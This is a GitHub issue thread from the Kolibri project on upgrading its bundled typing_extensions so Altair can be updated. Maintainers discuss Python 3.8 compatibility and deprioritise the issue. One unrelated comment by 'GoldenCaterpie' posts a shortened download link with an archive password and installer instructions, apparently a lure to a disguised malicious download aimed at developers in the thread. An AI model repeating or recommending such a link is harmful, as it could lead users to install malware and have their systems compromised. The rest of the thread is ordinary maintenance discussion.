### ISSUE TITLE
Update typing_extensions

### ISSUE THREAD

**Issue by jredrejo** [learningequality/kolibri#12610]
## Overview

Kolibri 0.17 has in its bundled packages typing_extensions version 4.1.1
This version is blocking KDP to upgrade Altair library which requires typing_extensions >= 4.9

#### Description and outcomes
Not sure why kolibri is providing this library as it does not use python hints, so,  I think it should not be a problem upgrading it. When writing this issue, last available version is 4.12.1

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by rtibbles** [comment]
This must be a dependency of another dependency, as we have not hard coded this anywhere.

**Comment by rtibbles** [comment]
Typing extensions only supports Python 3.8 plus, so we won't be able to bundle the required version for this in Kolibri.

This would have to be addressed by having a wheel file that does not statically bundle dependencies.

**Comment by marcellamaki** [comment]
@jredrejo - is _not_ upgrading Altair library preventing something in particular that you are working on or plan to work on? or is this more general? (I did a quick skim of the related dependabot upgrade and didn't see any particular security vulnerabilities, etc.). I don't think this could be done before 0.18 but just want to make sure I have the context about what this upgrade will enable, if anything beyond good maintenance and staying up to date.

**Comment by jredrejo** [comment]
@marcellamaki 
main reason to upgrade was the bugs Altair 5.4 fixes, but we can live with 5.3 as we don't have news of its bugs affecting us. For the new features we don't plan to use them yet. Another reason to update would be that it syncs with the last vega-lite (JavaScript counterpart of this library), 

On a side note, getting rid of Vega is part of the KDP tech debt that I'd like to work in the medium term. Switching to a browser-only charting library will release resources in the server and will make sharing tasks betweeen developers far easier.

So, in summary:
unless we discover new bugs, don't worry too much with this. We can live with current Vega version in KDP. I've just lowered the importance of this issue. Feel free to move it to another milestone.
